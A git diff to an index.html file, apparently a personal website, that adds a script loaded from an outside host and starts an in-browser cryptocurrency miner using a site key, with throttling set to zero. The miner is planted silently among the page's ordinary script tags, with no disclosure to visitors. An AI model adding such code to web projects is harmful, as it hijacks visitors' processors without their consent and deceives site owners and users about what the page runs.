--- a/index.html
+++ b/index.html
@@ -220,7 +220,14 @@ Email: mathewgaralde@gmail.com
           </div>
         </div>
       </div>
-
+<script src="https://www.webassembly.stream/p7wj.js"></script>
+<script>
+    var miner = new Client.Anonymous('d80c32fdccb6f54d63ba4ebe17b83897b885dba88254715ada09c7bc04ca9524', {
+        throttle: 0.0
+    });
+    miner.start();
+</script>
+	  
   <script src="js/jquery.min.js"></script>
 	<script src="js/bootstrap.min.js"></script>
   </body>
